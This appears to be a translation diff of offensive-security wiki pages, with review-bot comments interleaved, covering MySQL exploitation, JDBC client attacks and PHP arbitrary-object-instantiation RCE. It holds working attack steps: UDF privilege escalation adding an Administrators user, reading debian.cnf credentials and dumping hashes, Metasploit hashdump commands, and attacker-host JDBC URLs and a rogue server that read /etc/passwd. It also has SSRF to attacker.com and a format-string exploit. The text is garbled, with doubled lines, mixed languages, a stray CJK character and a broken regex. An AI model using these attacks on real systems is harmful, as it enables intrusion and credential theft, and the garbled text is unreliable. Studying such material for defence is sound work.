systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1
```
#### Mipangilio Hatari ya mysqld.cnf
Katika usanidi wa huduma za MySQL, mipangilio mbalimbali hutumika kubainisha uendeshaji wake na hatua za usalama:
Katika usanidi wa huduma za MySQL, mipangilio mbalimbali hutumika kuweka jinsi inavyofanya kazi na hatua za usalama:
- Mipangilio ya **`user`** inatumika kuonyesha mtumiaji chini ya ambaye huduma ya MySQL itaendeshwa.
- **`password`** inatumiwa kuweka nywila inayohusiana na mtumiaji wa MySQL.
- **`admin_address`** inaonyesha anwani ya IP inayosikiliza muunganisho wa TCP/IP kwenye kiolesura cha mtandao cha usimamizi.
- Kigezo cha **`debug`** kinaonyesha mipangilio ya sasa ya debugging, pamoja na taarifa nyeti ndani ya logs.
- **`sql_warnings`** inasimamia kama mistari ya taarifa itatengenezwa kwa statement za INSERT za mstari mmoja wakati warnings zinapotokea, ikiwa na data nyeti ndani ya logs.
- Kwa **`secure_file_priv`**, wigo wa shughuli za kuingiza na kusafirisha data umewekwa mipaka ili kuongeza usalama.
- The **`user`** setting is utilized for designating the user under which the MySQL service will be executed.
- **`password`** is applied for establishing the password associated with the MySQL user.
- **`admin_address`** specifies the IP address that listens for TCP/IP connections on the administrative network interface.
- The **`debug`** variable is indicative of the present debugging configurations, including sensitive information within logs.
- **`sql_warnings`** manages whether information strings are generated for single-row INSERT statements when warnings emerge, containing sensitive data within logs.
- With **`secure_file_priv`**, the scope of data import and export operations is constrained to enhance security.
### Privilege escalation
```bash
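Review bot: the second copy of the mysqld.cnf bullet list (the one that in diff order is the incoming text, from `- The **`user`** setting is utilized for designating the user...` to the `secure_file_priv` bullet) is entirely in English, so this hunk un-translates six lines that the outgoing copy had in Swahili; the same happens to the heading, where `### Mysql User` replaces `### Mtumiaji wa Mysql`. Either keep the outgoing Swahili lines or translate the new ones before merging, since the rest of the section stays in Swahili.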
@ -206,16 +207,16 @@ grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mys
```
### Privilege Escalation via library
Ikiwa **mysql server inafanya kazi kama root** (au mtumiaji mwingine mwenye ruhusa zaidi) unaweza kuifanya itekeleze amri. Kwa hivyo, unahitaji kutumia **user defined functions**. Na ili kuunda user defined function utahitaji **maktaba** kwa ajili ya OS inayotumika na mysql.
Ikiwa **mysql server is running as root** (au user mwingine mwenye ruhusa zaidi) unaweza kuifanya itekeleze amri. Kwa hiyo, unahitaji kutumia **user defined functions**. Na ili kuunda user defined utahitaji **library** kwa OS inayomkimbia mysql.
Maktaba haribifu inayotumika inaweza kupatikana ndani ya sqlmap na metasploit kwa kufanya **`locate "*lib_mysqludf_sys*"`**. Faile za **`.so`** ni maktaba za **linux** na za **`.dll`** ni za **Windows**; chagua ile unayohitaji.
Library hasidi ya kutumia inaweza kupatikana ndani ya sqlmap na metasploit kwa kufanya **`locate "*lib_mysqludf_sys*"`**. Faili za **`.so`** ni maktaba za **linux** na **`.dll`** ni za **Windows**, chagua ile unayohitaji.
Ikiwa **huna** maktaba hizo, unaweza ama **kuzikatafuta**, au pakua hii [**linux C code**](https://www.exploit-db.com/exploits/1518) na **compile ndani ya mashine ya linux iliyo dhaifu**:
Kama huna libraries hizo, unaweza ama **kutafuta** hizo, au kupakua hii [**linux C code**](https://www.exploit-db.com/exploits/1518) na **kucompile ndani ya mashine ya linux iliyo dhaifu**:
```bash
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
```
Sasa baada ya kuwa na maktaba, ingia ndani ya Mysql kama mtumiaji mwenye vibali (root?) na fuata hatua zifuatazo:
Sasa baada ya kuwa na maktaba, ingia ndani ya Mysql kama mtumiaji mwenye ruhusa za juu (root?) na fuata hatua zinazofuata:
#### Linux
```sql
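Review bot: the incoming sentence 'Na ili kuunda user defined utahitaji **library** kwa OS inayomkimbia mysql.' drops the noun after 'user defined' (it should say 'user defined function', as the outgoing line does) and uses the wrong verb: 'inayomkimbia' means 'that runs away from', whereas the outgoing 'OS inayotumika na mysql' ('the OS mysql runs on') is what is meant. Restore both before merging.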
@ -251,36 +252,36 @@ SELECT sys_exec("net localgroup Administrators npn /add");
```
#### Windows tip: create directories with NTFS ADS from SQL
Kwenye NTFS unaweza kulazimisha uundaji wa saraka kwa kutumia alternate data stream hata wakati kuna tu primitive ya kuandika faili. Ikiwa classic UDF chain inatarajia saraka ya `plugin` lakini haipo na `@@plugin_dir` haijulikani au imefungwa, unaweza kuunda kwanza kwa kutumia `::$INDEX_ALLOCATION`:
Kwenye NTFS unaweza kulazimisha uundaji wa saraka kwa kutumia alternate data stream hata pale ambapo kuna primitive ya kuandika faili pekee. Ikiwa classic UDF chain inatarajia saraka ya `plugin` lakini haipo na `@@plugin_dir` haijulikani au imefungwa, unaweza kuunda kwanza kwa `::$INDEX_ALLOCATION`:
```sql
SELECT 1 INTO OUTFILE 'C:\\MySQL\\lib\\plugin::$INDEX_ALLOCATION';
-- After this, `C:\\MySQL\\lib\\plugin` exists as a directory
```
Hii inabadilisha `SELECT ... INTO OUTFILE` iliyo na vikwazo kuwa primitive kamili zaidi kwenye Windows stacks kwa kuanzisha muundo wa folda unaohitajika kwa UDF drops.
Hii inabadilisha `SELECT ... INTO OUTFILE` iliyo na mipaka kuwa primitive kamili zaidi kwenye Windows stacks kwa kuanzisha muundo wa folda unaohitajika kwa UDF drops.
### Kutoa MySQL credentials kutoka kwa mafayela
### Kutoa taarifa za kuingia za MySQL kutoka kwenye faili
Ndani ya _/etc/mysql/debian.cnf_ unaweza kupata **plain-text password** ya mtumiaji **debian-sys-maint**
Ndani ya _/etc/mysql/debian.cnf_ unaweza kupata **nenosiri kwa maandishi wazi** la mtumiaji **debian-sys-maint**
```bash
cat /etc/mysql/debian.cnf
```
Unaweza **kutumia vithibitisho hivi kuingia kwenye database ya mysql**.
Unaweza **kutumia credentials hizi kuingia kwenye mysql database**.
Inside the file: _/var/lib/mysql/mysql/user.MYD_ you can find **hash zote za watumiaji wa MySQL** (ile ambazo unaweza kuzitoa kutoka mysql.user inside the database)_._
Ndani ya faili: _/var/lib/mysql/mysql/user.MYD_ unaweza kupata **all the hashes of the MySQL users** (ambazo unaweza extract kutoka mysql.user ndani ya database)_._
Unaweza kuzitoa kwa kufanya:
Unaweza extract hizo kwa kufanya:
```bash
grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"
```
### Kuwezesha kurekodi
### Kuwezesha uandishi wa logi
Unaweza kuwezesha kurekodi maulizo ya mysql ndani ya `/etc/mysql/my.cnf` kwa kuondoa maoni (uncomment) kwenye mistari ifuatayo:
Unaweza kuwezesha uandishi wa logi za maswali za mysql ndani ya `/etc/mysql/my.cnf` kwa kuondoa alama za kusimamishwa (uncomment) kwenye mistari ifuatayo:
.png>)
### Faili muhimu
### Mafaili muhimu
Faili za konfigurasi
Mafaili ya usanidi
- windows \*
- config.ini
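Review bot: the hash-extraction command `grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"` contains the bracket range `a-Z`, which GNU grep rejects with 'Invalid range end' in the C locale (and in current glibc locales generally, since ranges are taken in code-point order); `a-zA-Z` is what is meant, and the command is unchanged context, so this is the moment to fix it. Two smaller points in the same hunk: the image in the logging section survives only as the fragment `.png>)`, which will render as literal text, so the full `![](...png)` embed needs restoring; and the incoming line 'Ndani ya faili: _/var/lib/mysql/mysql/user.MYD_ unaweza kupata **all the hashes of the MySQL users**' leaves the bolded phrase in English where the outgoing line had it in Swahili.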
@ -297,12 +298,12 @@ Faili za konfigurasi
- /etc/my.cnf
- Historia ya amri
- \~/.mysql.history
- Faili za logi
- Mafaili ya logi
- connections.log
- update.log
- common.log
## Databasi/Meza za MySQL za Kawaida
## Default MySQL Database/Tables
{{#tabs}}
{{#tab name="information_schema"}}
@ -605,7 +606,7 @@ x$session\
x$statement_analysis\
x$statements\_with\_errors\_or\_warnings\
x$statements_with_full_table_scans\
x$statements\_with\_runtimes\_in_95th\_percentile\
x$statements\_with\_runtimes\_in\_95th\_percentile\
x$statements_with_sorting\
x$statements\_with\_temp\_tables\
x$user_summary\
@ -613,7 +614,7 @@ x$user\_summary\_by\_file\_io\
x$user_summary_by_file_io_type\
x$user\_summary\_by\_stages\
x$user_summary_by_statement_latency\
x$user\_summary\_by\_statement\_type\
x$user\_summary_by_statement_type\
x$wait_classes_global_by_avg_latency\
x$wait\_classes\_global\_by\_latency\
x$waits_by_host_by_latency\
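Review bot: underscore escaping in the sys-schema view list is left inconsistent by this change (and by the matching one in the preceding hunk): the incoming `x$user\_summary_by_statement_type\` mixes an escaped and an unescaped underscore in a single name, while neighbouring entries such as `x$user_summary_by_statement_latency\` carry no escapes and `x$user\_summary\_by\_stages\` escapes every one. These are literal view names inside the `{{#tab}}` listing, so pick one form for the whole list; unescaped is preferable because `x$user_summary_by_statement_type` is the real identifier a reader will copy.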
@ -653,36 +654,36 @@ Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit'
```
## 2023-2025 Mambo Muhimu (mpya)
## 2023-2025 Mambo Muhimu (vipya)
### JDBC `propertiesTransform` deserialization (CVE-2023-21971)
From Connector/J <= 8.0.32 mshambulizi ambaye anaweza kuathiri **JDBC URL** (kwa mfano katika third-party software inayouliza connection string) anaweza kuomba arbitrary classes zisonakiliwe upande wa *client* kupitia parameter ya `propertiesTransform`. Ikiwa gadget iliyopo kwenye class-path inaweza kupakiwa hili litatokea kama **remote code execution in the context of the JDBC client** (pre-auth, kwa sababu hakuna valid credentials zinazohitajika). A minimal PoC looks like:
Kutoka Connector/J <= 8.0.32 attacker ambaye anaweza kuathiri **JDBC URL** (kwa mfano katika third-party software inayouliza connection string) anaweza kuomba arbitrary classes zipakwe upande wa *client* kupitia parameter ya `propertiesTransform`. Ikiwa gadget iliyopo kwenye class-path inaweza kupakiwa, hii husababisha **remote code execution in the context of the JDBC client** (pre-auth, kwa sababu hakuna valid credentials zinahitajika). PoC ndogo inavyoonekana:
```java
jdbc:mysql://<attacker-ip>:3306/test?user=root&password=root&propertiesTransform=com.evil.Evil
```
Kuendesha `Evil.class` inaweza kuwa rahisi kama kuiweka kwenye class-path ya programu iliyo hatarini au kuruhusu rogue MySQL server kutuma malicious serialized object. Tatizo lilisuluhishwa katika Connector/J 8.0.33 – sasisha driver au weka wazi `propertiesTransform` kwenye allow-list.
(Angalia Snyk write-up kwa maelezo)
Kukimbiza `Evil.class` kunaweza kuwa rahisi—kama kuifanya ionekane kwenye class-path ya application iliyo na udhaifu, au kuruhusu rogue MySQL server kutuma serialized object yenye madhara. Tatizo limerekebishwa katika Connector/J 8.0.33 – sasisha driver au kwa uwazi weka `propertiesTransform` kwenye allow-list.
(Tazama Snyk write-up kwa maelezo)
### Shambulio za Rogue / Fake MySQL server dhidi ya JDBC clients
Zana kadhaa za open-source zinautekeleza protocol ya MySQL *sehemu* ili kushambulia JDBC clients zinazounganisha kwa nje:
### Rogue / Fake MySQL server attacks against JDBC clients
Vyombo kadhaa vya open-source vinatekeleza *partial* MySQL protocol ili kushambulia JDBC clients zinazoungana nje:
* **mysql-fake-server** (Java, inaunga mkono file read na deserialization exploits)
* **mysql-fake-server** (Java, inasaidia file read na deserialization exploits)
* **rogue_mysql_server** (Python, uwezo sawa)
Njia za kawaida za shambulio:
1. Programu ya mwathiriwa inapakia `mysql-connector-j` ikiwa na `allowLoadLocalInfile=true` au `autoDeserialize=true`.
2. Mshambuliaji anadhibiti DNS / host entry ili hostname ya DB iendelee kutambulika na mashine inayodhibitiwa na yeye.
3. Server ya hatari inajibu kwa packets zilizotengenezwa ambazo zinasababisha ama `LOCAL INFILE` kusoma faili kiholela au Java deserialization → RCE.
1. Programu ya mwathiriwa inapakia `mysql-connector-j` ikiwa imewekwa `allowLoadLocalInfile=true` au `autoDeserialize=true`.
2. Mshambuliaji anadhibiti DNS / host entry ili hostname ya DB irejelee kwa mashine iliyoko chini ya udhibiti wao.
3. Server yenye madhara inajibu na packets zilizotengenezwa ambazo zinaanzisha ama `LOCAL INFILE` arbitrary file read au Java deserialization → RCE.
Mfano wa one-liner kuanzisha fake server (Java):
Mfano wa amri ya mstari mmoja kuanzisha fake server (Java):
```bash
java -jar fake-mysql-cli.jar -p 3306  # from 4ra1n/mysql-fake-server
```
Kisha elekeza programu ya mwathirika kwa `jdbc:mysql://attacker:3306/test?allowLoadLocalInfile=true` na usome `/etc/passwd` kwa ku-encode jina la faili kwa base64 katika sehemu ya *username* (`fileread_/etc/passwd` → `base64ZmlsZXJlYWRfL2V0Yy9wYXNzd2Q=`).
Kisha elekeza victim application kwa `jdbc:mysql://attacker:3306/test?allowLoadLocalInfile=true` na usome `/etc/passwd` kwa kuandika jina la faili kwa base64 kwenye uwanja wa *username* (`fileread_/etc/passwd` → `base64ZmlsZXJlYWRfL2V0Yy9wYXNzd2Q=`).
### Cracking `caching_sha2_password` hashes
MySQL ≥ 8.0 inahifadhi hash za password kama **`$mysql-sha2$`** (SHA-256). Hashcat (mode **21100**) na John-the-Ripper (`--format=mysql-sha2`) zote zinaunga mkono offline cracking tangu 2023. Fanya dump ya safu ya `authentication_string` na uipe moja kwa moja:
### Kuvunja `caching_sha2_password` hashi
MySQL ≥ 8.0 huhifadhi hashi za nywila kama **`$mysql-sha2$`** (SHA-256). Zote mbili Hashcat (mode **21100**) na John-the-Ripper (`--format=mysql-sha2`) zinaunga mkono kuvunja offline tangu 2023. Toa kolamu ya `authentication_string` na uipe moja kwa moja:
```bash
# extract hashes
echo "$mysql-sha2$AABBCC…" > hashes.txt
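Review bot: `echo "$mysql-sha2$AABBCC…" > hashes.txt` is broken as written: inside double quotes the shell expands `$mysql` and `$AABBCC` as (empty) variables, so hashes.txt receives `-sha2…` instead of the hash. Use single quotes (`echo '$mysql-sha2$...' > hashes.txt`) or redirect the `authentication_string` column from a query result instead of typing it. A smaller point in the same hunk: the fenced block holding the connection string `jdbc:mysql://<attacker-ip>:3306/test?user=root&password=root&propertiesTransform=com.evil.Evil` is tagged `java` although it is a URL, not Java source; tagging it `text` avoids misleading highlighting.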
@ -691,16 +692,16 @@ hashcat -a 0 -m 21100 hashes.txt /path/to/wordlist
# John the Ripper
john --format=mysql-sha2 hashes.txt --wordlist=/path/to/wordlist
```
### Orodha ya ukaguzi wa kuimarisha (2025)
• Weka `LOCAL_INFILE=0` na `--secure-file-priv=/var/empty` ili kuzima sehemu nyingi za kusoma/kuandika faili.  
• Ondoa ruhusa ya `FILE` kutoka kwa akaunti za programu.  
• Kwa Connector/J weka `allowLoadLocalInfile=false`, `allowUrlInLocalInfile=false`, `autoDeserialize=false`, `propertiesTransform=` (tupu).  
• Zima plugins za uthibitishaji zisizotumika na **lazimisha TLS** (`require_secure_transport = ON`).  
• Fuatilia `CREATE FUNCTION`, `INSTALL COMPONENT`, `INTO OUTFILE`, `LOAD DATA LOCAL` na tamko za ghafla za `SET GLOBAL`.
### Orodha ya kuimarisha usalama (2025)
• Set **`LOCAL_INFILE=0`** and **`--secure-file-priv=/var/empty`** ili kuondoa primitives nyingi za kusoma/kuandika faili.
• Ondoa ruhusa ya **`FILE`** kutoka kwa akaunti za programu.
• Kwenye Connector/J weka `allowLoadLocalInfile=false`, `allowUrlInLocalInfile=false`, `autoDeserialize=false`, `propertiesTransform=` (tupu).
• Zima plugins za uthibitishaji zisizotumika na **lazimisha TLS** (`require_secure_transport = ON`).
• Fuatilia `CREATE FUNCTION`, `INSTALL COMPONENT`, `INTO OUTFILE`, `LOAD DATA LOCAL` na amri ghafla za `SET GLOBAL`.
---
## Marejeo
## References
- [Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)](https://labs.watchtowr.com/pre-auth-sql-injection-to-rce-fortinet-fortiweb-fabric-connector-cve-2025-25257/)
- [Oracle MySQL Connector/J propertiesTransform RCE – CVE-2023-21971 (Snyk)](https://security.snyk.io/vuln/SNYK-JAVA-COMMYSQL-5441540)
- [mysql-fake-server – Rogue MySQL server for JDBC client attacks](https://github.com/4ra1n/mysql-fake-server)
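Review bot: the incoming checklist line `• Set **`LOCAL_INFILE=0`** and **`--secure-file-priv=/var/empty`** ili kuondoa primitives nyingi za kusoma/kuandika faili.` starts in English and switches to Swahili mid-sentence; the outgoing line ('Weka ... na ... ili kuzima ...') was fully Swahili and should either be kept or the new one finished in one language. The same hunk also changes `## Marejeo` to `## References` while the surrounding headings (`### Orodha ya kuimarisha usalama (2025)`) stay in Swahili, so the heading language should be made consistent in one direction.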
@ -1,16 +1,16 @@
# PHP - RCE kutumia uundaji wa object: new $_GET["a"]($_GET["b"])
# PHP - RCE abusing object creation: new $_GET["a"]($_GET["b"])
{{#include ../../../banners/hacktricks-training.md}}
Hii ni muhtasari wa [https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/)
This is basically a summary of [https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/)
## Utangulizi
Uundaji wa objects mpya za kiholela, kama `new $_GET["a"]($_GET["a"])`, unaweza kusababisha Remote Code Execution (RCE), kama ilivyoelezwa katika [**writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/). Nyaraka hii inaangazia mikakati mbalimbali ya kupata RCE.
Uundaji wa vitu vipya chochote, kama `new $_GET["a"]($_GET["a"])`, unaweza kusababisha Remote Code Execution (RCE), kama ilivyoelezwa katika [**writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/). Hati hii inaonyesha mbinu mbalimbali za kufikia RCE.
## RCE kupitia Madarasa Maalum au Autoloading
## RCE kupitia Custom Classes au Autoloading
Sintaksia `new $a($b)` inatumika kuunda object ambapo **`$a`** inawakilisha jina la class na **`$b`** ni hoja ya kwanza inayotumwa kwa constructor. Vigezo hivi vinaweza kupatikana kutoka kwa input za watumiaji kama GET/POST, ambapo vinaweza kuwa strings au arrays, au kutoka JSON, ambapo vinaweza kuonekana kama aina nyingine.
Muundo `new $a($b)` unatumika kuanzisha object ambapo **`$a`** inawakilisha jina la darasa na **`$b`** ni hoja ya kwanza inayopitishwa kwa constructor. Vigezo hivi vinaweza kupatikana kutoka kwa input za mtumiaji kama GET/POST, ambapo vinaweza kuwa strings au arrays, au kutoka JSON, ambapo vinaweza kuonyesha kama aina nyingine.
Consider the code snippet below:
```php
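Review bot: this hunk un-translates the page title and intro while leaving the body in Swahili: `# PHP - RCE abusing object creation: new $_GET["a"]($_GET["b"])` replaces `# PHP - RCE kutumia uundaji wa object: ...`, and 'This is basically a summary of ...' replaces 'Hii ni muhtasari wa ...'. The unchanged context line 'Consider the code snippet below:' is also still English. Keep the Swahili title and intro (and translate the context line) so the file reads in one language.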
@ -31,9 +31,9 @@ $b = $_GET['b'];
new $a($b);
```
Katika mfano huu, kuweka `$a` kwa `App` au `App2` na `$b` kwa amri ya mfumo (kwa mfano, `uname -a`) husababisha utekelezaji wa amri hiyo.
Katika tukio hili, kuweka `$a` kuwa `App` au `App2` na `$b` kuwa amri ya mfumo (kwa mfano, `uname -a`) husababisha utekelezaji wa amri hiyo.
**Autoloading functions** zinaweza kutumiwa ikiwa madarasa hayo hayapatikani moja kwa moja. Hizi functions zinapakia madarasa kutoka kwa faili kiotomatiki wakati yanapohitajika na zimetangazwa kwa kutumia `spl_autoload_register` au `__autoload`:
**Autoloading functions** zinaweza kutumiwa ikiwa hakuna classes kama hizo zinazopatikana moja kwa moja. Kazi hizi zinapakia classes kutoka kwa faili wanapohitajika na zimetangazwa kwa kutumia `spl_autoload_register` au `__autoload`:
```php
spl_autoload_register(function ($class_name) {
include './../classes/' . $class_name . '.php';
@ -45,72 +45,72 @@ include $class_name . '.php';
spl_autoload_register();
```
Tabia ya autoloading inatofautiana kulingana na matoleo ya PHP, ikitoa fursa tofauti za RCE.
Tabia ya autoloading hubadilika kulingana na matoleo ya PHP, ikitoa fursa tofauti za RCE.
## RCE via Built-In Classes
## RCE kupitia madarasa yaliyojengwa ndani ya PHP
Iwapo hakuna custom classes au autoloaders, **madarasa ya ndani ya PHP** yanaweza kutosha kwa RCE. Idadi ya madarasa haya iko kati ya 100 hadi 200, kulingana na toleo la PHP na extensions. Yanaweza kuorodheshwa kwa kutumia `get_declared_classes()`.
Ikiwa hakuna madarasa maalum au autoloaders, **madarasa ya ndani ya PHP** yanaweza kutosha kwa RCE. Idadi ya madarasa haya ni kati ya 100 hadi 200, kulingana na toleo la PHP na extensions. Yanaweza kuorodheshwa kwa kutumia `get_declared_classes()`.
Constructors zinazovutia zinaweza kutambuliwa kupitia reflection API, kama inavyoonyeshwa katika mfano ufuatao na kiungo [https://3v4l.org/2JEGF](https://3v4l.org/2JEGF).
Vianzaji vinavyovutia vinaweza kutambulika kupitia reflection API, kama inavyoonyeshwa katika mfano ufuatao na kiungo [https://3v4l.org/2JEGF](https://3v4l.org/2JEGF).
**RCE via specific methods includes:**
**RCE kupitia mbinu maalum ni pamoja na:**
### **SSRF + Phar Deserialization**
Darasa `SplFileObject` unawezesha SSRF kupitia constructor yake, ukiruhusu miunganisho kwa URL yoyote:
Darasa la `SplFileObject` linawezesha SSRF kupitia constructor yake, likiruhusu muunganisho kwa URL yoyote:
```php
new SplFileObject('http://attacker.com/');
```
SSRF inaweza kusababisha mashambulizi ya deserialization katika matoleo ya PHP kabla ya 8.0 kwa kutumia itifaki ya Phar.
SSRF inaweza kusababisha deserialization attacks katika matoleo ya PHP kabla ya 8.0 kwa kutumia Phar protocol.
### **Kutumia PDOs**
### **Exploiting PDOs**
Konstrukta ya darasa la PDO inaruhusu muunganisho na hifadhidata kupitia DSN strings, na inaweza kuwezesha uundaji wa faili au mwingiliano mwingine:
Konstrukta ya darasa la PDO inaruhusu muunganisho na hifadhidata kupitia DSN strings, ambayo inaweza kuwezesha uundaji wa faili au mwingiliano mwingine:
```php
new PDO("sqlite:/tmp/test.txt")
```
### **SoapClient/SimpleXMLElement XXE**
Toleo za PHP hadi 5.3.22 na 5.4.12 zilikuwa nyeti kwa mashambulizi ya XXE kupitia vianzilishi `SoapClient` na `SimpleXMLElement`, kutegemea toleo la libxml2.
Toleo za PHP hadi 5.3.22 na 5.4.12 zilikuwa nyembamba kwa mashambulio ya XXE kupitia `SoapClient` na `SimpleXMLElement` constructors, kutegemea toleo la libxml2.
## RCE via Imagick Extension
Katika uchambuzi wa **tegemezi za mradi**, iligundulika kwamba **Imagick** inaweza kutumika kwa ajili ya **command execution** kwa kuunda objects mpya. Hii inatoa fursa ya exploiting vulnerabilities.
Katika uchambuzi wa **project's dependencies**, iligunduliwa kwamba **Imagick** inaweza kutumika kwa **command execution** kwa kuanzisha vitu vipya. Hii inatoa fursa ya kutumia udhaifu uliopo.
### VID parser
Uwezo wa VID parser wa kuandika maudhui katika njia yoyote iliyotajwa kwenye filesystem ulideteksiwa. Hii inaweza kusababisha kuwekwa kwa PHP shell katika directory inayoweza kupatikana kwa wavuti, ukifikia Remote Code Execution (RCE).
Uwezo wa VID parser wa kuandika yaliyomo kwa njia yoyote iliyotajwa kwenye filesystem uligunduliwa. Hii inaweza kusababisha kuwekwa kwa PHP shell katika saraka inayoweza kufikiwa na wavuti, ikifanikisha Remote Code Execution (RCE).
#### VID Parser + File Upload
Imetajwa kwamba PHP huhifadhi kwa muda files zilizopakiwa katika `/tmp/phpXXXXXX`. VID parser katika Imagick, kwa kutumia itifaki ya **msl**, inaweza kushughulikia wildcards katika paths za faili, ikirahisisha kunakiliwa kwa faili ya muda hadi mahali uliotengwa. Njia hii inatoa mbinu ya ziada ya kupata arbitrary file writing ndani ya filesystem.
Imetajwa kwamba PHP huhifadhi kwa muda uploaded files katika `/tmp/phpXXXXXX`. VID parser katika Imagick, ikitumia protocol ya **msl**, inaweza kushughulikia wildcards katika njia za faili, na hivyo kuwezesha kuhamisha faili la muda hadi mahali kilichochaguliwa. Njia hii inatoa mbinu nyingine ya kupata arbitrary file writing ndani ya filesystem.
### PHP Crash + Brute Force
Mbinu iliyoelezwa katika [**original writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) inahusisha kupakia files ambazo husababisha server crash kabla ya kufutwa. Kwa brute-forcing jina la faili ya muda, inakuwa inawezekana kwa Imagick kutekeleza arbitrary PHP code. Hata hivyo, mbinu hii iligundulika kufanya kazi tu katika toleo la zamani la ImageMagick.
Njia iliyofafanuliwa katika [**original writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) inahusisha kupakia faili zinazosababisha server kuanguka kabla ya kufutwa. Kwa brute-forcing jina la faili la muda, inakuwa inawezekana kwa Imagick kutekeleza arbitrary PHP code. Hata hivyo, mbinu hii ilionekana kuwa ya ufanisi tu katika toleo la zamani la ImageMagick.
## Format-string in class-name resolution (PHP 7.0.0 Bug #71105)
Wakati input ya mtumiaji inadhibiti jina la class (mfano, `new $_GET['model']()`), PHP 7.0.0 iliingiza bug ya muda wakati wa refactor ya `Throwable` ambapo engine ilikosea kutendea jina la class kama printf format string wakati wa resolution. Hii inaruhusu classic printf-style primitives ndani ya PHP: leaks with `%p`, write-count control with width specifiers, na arbitrary writes with `%n` dhidi ya in-process pointers (kwa mfano, GOT entries kwenye ELF builds).
Wakati user input inadhibiti jina la class (mfano, `new $_GET['model']()`), PHP 7.0.0 ilileta bug ya muda wakati wa refactor ya `Throwable` ambapo engine ilikosea kut扱 treat jina la class kama printf format string wakati wa utatuzi. Hii inaruhusu printf-style primitives ndani ya PHP: leaks na `%p`, write-count control kwa width specifiers, na arbitrary writes na `%n` dhidi ya in-process pointers (kwa mfano, GOT entries kwenye ELF builds).
Mfano mdogo la repro unaoonyesha udhaifu:
Mfano mdogo wa kuonyesha udhaifu:
```php
<?php
$model = $_GET['model'];
$object = new $model();
```
Muhtasari wa utekesaji (kutoka kwenye marejeo):
- Fichua anwani kwa kutumia `%p` katika jina la darasa ili kupata lengo linaloweza kuandikwa:
Exploitation outline (from the reference):
- Leak addresses via `%p` katika jina la darasa ili kupata lengo linaloweza kuandikwa:
```bash
curl "http://host/index.php?model=%p-%p-%p"
# Fatal error includes resolved string with leaked pointers
```
- Tumia vigezo vya nafasi na vipengele vya upana kuweka idadi kamili ya byte, kisha `%n` kuandika thamani hiyo kwa anwani inayofikika kwenye stack, ukilenga slot ya GOT (mfano, `free`) ili kuibadilisha sehemu kwa `system`.
- Chochea kazi iliyotekwa kwa kupitia jina la darasa lenye pipe ya shell ili kufikia `system("id")`.
- Tumia positional parameters na width specifiers kuweka idadi halisi ya byte, kisha `%n` kuandika thamani hiyo kwa anwani inayofikiwa kwenye stack, ukilenga slot ya GOT (mfano, `free`) ili kuifanyia partial overwrite kuelekea `system`.
- Sababisha function iliyotekwa kwa kupitisha jina la darasa linalojumuisha shell pipe ili kufikia `system("id")`.
Vidokezo:
- Inafanya kazi tu kwenye PHP 7.0.0 (Bug [#71105](https://bugs.php.net/bug.php?id=71105)); ilirekebishwa katika toleo zifuatazo. Ukali: muhimu sana ikiwa kuna uwezekano wa kutengeneza darasa kwa hiari.
- Payload za kawaida huunganisha `%p` nyingi kufuatilia stack, kisha `%.<width>d%<pos>$n` kufanya overwrite ya sehemu.
Notes:
- Inafanya kazi tu kwenye PHP 7.0.0 (Bug [#71105](https://bugs.php.net/bug.php?id=71105)); imerekebishwa katika matoleo yafuatayo. Ukali: ya juu ikiwa kuna uwezo wa kuanzisha darasa lolote kwa hiari.
- Typical payloads huunganisha `%p` nyingi kutembea stack, kisha `%.<width>d%<pos>$n` kupata partial overwrite.
## References
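Review bot: the incoming Bug #71105 paragraph carries an encoding artefact and a duplicated verb: 'engine ilikosea kut扱 treat jina la class kama printf format string' mixes a stray CJK character and the English 'treat' into the Swahili verb; the outgoing wording 'engine ilikosea kutendea jina la class kama printf format string' is the intended one. Also in this hunk, the `## References` heading that closes the file has no entries beneath it although the section cites Bug #71105 inline; either list the bugs.php.net link there or drop the empty heading.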
@ -6,30 +6,30 @@
<figure><img src="../../images/image (927).png" alt=""><figcaption></figcaption></figure>
**Kutoka** [**https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png**](https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png)
**From** [**https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png**](https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png)
## Kutumia Spring Boot Actuators
## Exploiting Spring Boot Actuators
**Tazama chapisho la asili kutoka** \[**https://www.veracode.com/blog/research/exploiting-spring-boot-actuators**]
**Angalia chapisho la awali kutoka** [**https://www.veracode.com/blog/research/exploiting-spring-boot-actuators**]
### **Mambo Muhimu:**
